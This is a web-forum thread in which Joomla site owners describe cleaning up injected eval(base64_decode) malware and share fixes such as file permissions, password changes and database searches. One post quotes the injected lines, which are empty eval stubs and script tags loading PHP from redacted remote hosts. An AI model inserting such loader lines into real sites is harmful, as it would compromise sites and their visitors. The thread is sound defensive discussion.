Page 1 of 1

eval(base64_decode [SOLVED]

Posted: Mon Dec 15, 2008 4:58 pm
by elindalo
Hello all! In many pages of my web appear a strange code "<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFyd..............." and they have links to other pages externals and mine dont open totally. This is a example: http://xxxxxxxxxx where you can see my problem. I have read a lot about this theme in internet, but nobody coment a solution. Please, I delete all eva(base64.... that I see in my pages, but I dont fix all. Can I must delete something more? Sorry my poor english, and thanks in advance for your help. I think so many people have this problem. Please, what can I do? Greetings from Spain.

Re: eval(base64_decode

Posted: Wed Dec 17, 2008 12:21 pm
by dragonrider
Check the configuration.php, index.php and templates/index.php files for the hacked code. Delete the code and resave. See if that fixes it. You will also need to make sure your files are set to no higher than 644 via CHMOD permissions.

Re: eval(base64_decode [SOLVED]

Posted: Fri Dec 19, 2008 2:24 pm
by elindalo
SOLVED

First, thank you very much, dragonrider, for your answer. I have followed that steps and I have deleted all code EVA(Base... that appear in these pages.

The problem, go on. Some pages have the error. I to grin and bear it. Third parts and permissions with "a little" flippancy for me. I am the only culpable.

SOLUTION:

Hallelujah!! at last! I see too much code EVA(Base... in FCKEDITOR folder I discover the problem there. I delete completly that folder.

Next, set, by first time in my joomla-life, all folders and files to 755 and 644. Now, if I need change a permission, I make it and return to security permission when finish the operation.

Lesson for me, all permissions are sacred now.

I hope this help to others members of this nice community. Greetings!

Re: eval(base64_decode [SOLVED]

Posted: Tue Jun 08, 2010 3:24 am
by tez
Just has this happen to me today. I have cleaned my website, but in case someone else needs to know, see below.
Change your FTP password first.
Download entire site.
Delete all files on site (make another backup first!)
Find/Replace all bad code by checking file modified dates and finding all bad code, this is usually different every few days.

This was the lines inserted into various files.

Code: Select all

<?php eval(base64_decode('')); ?>
<?php eval(base64_decode('')); ?>
<script src=http://deleted/celebs/rumble.php ></script>


document.write('<script src=http://deleted.co.uk/images/deleted.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
Also it created some files.

gifimg.php
changes.php

Re: eval(base64_decode [SOLVED]

Posted: Wed Apr 24, 2013 2:57 pm
by toner728
Ok so.. I had this issue with several of my sites and i have fixed it very easily. First of all it happened because the permissions of my folders were writable. Shame on the original webmaster. This is how i fixed it.
I dont know what kind of web editor you guys use.. I use Dreamweaver.
So.. I pulled down the entire site to a folder. Dreamweaver has a ctrl-F function which lets you do a search on a file "or the entire site" do an entire site search for that base64 code and leave the replace field with nothing.. Blank!! It will search and remove the code from the entire site. Then just do a sync to put newer files back to the server and u will be good.. I did this with 8 different sites and they are all clean

Re: eval(base64_decode [SOLVED]

Posted: Wed Apr 24, 2013 6:25 pm
by Tonie
Good that it's solved for you in this way. However, the cause of the hack hasn't been taken away by doing this.

Re: eval(base64_decode [SOLVED]

Posted: Wed Apr 24, 2013 8:23 pm
by toner728
Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?

Re: eval(base64_decode [SOLVED]

Posted: Wed Apr 24, 2013 9:56 pm
by mandville
toner728 wrote:Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?
might be best to run and post the fpa after runing security checklist 7

Re: eval(base64_decode [SOLVED]

Posted: Thu Apr 25, 2013 8:19 am
by Tonie
If I understood you correctly, you did the following:

- you removed the nastly code by search/replace
- then set permissions/changes passwords

This takes care of the hack showing to the public. Now the question is, how did the hacker enter your site in the first place? Through Joomla, webserver, one of the extensions, etc. This is not done just by the permissions on the server.

Re: eval(base64_decode [SOLVED]

Posted: Fri Jun 21, 2013 4:59 pm
by pictureperfectne
I'm probably late to the game but my host told me yesterday that only my joomla site out of all their hundreds of clients got hacked. Every php file in every folder was infected with eval(base 64_decode in it.) that's hundreds of files. I got a clean joomla zip file, uploaded and overlaid all of the joomla core files and then went through to clean up the rest.
The only way to access the root folder to do this kind of damage is through the server access like ftp. Does anyone have an htaccess file that uses ip addresses instead of password and user, because it somehow broke through the server using an http request. and was changing the permissions a good fix?

Thanks

Re: eval(base64_decode [SOLVED]

Posted: Sat Jun 22, 2013 11:03 am
by toner728
@pictureperfectne.. I would do a search in the DB because when it happened to us, our clients database had the code in it as well.

Re: eval(base64_decode [SOLVED]

Posted: Sat Jun 22, 2013 1:31 pm
by pictureperfectne
Thanks for the heads up. I'l do a sql dump and a keyword search. I really think that I need to protect the folders better with htaccess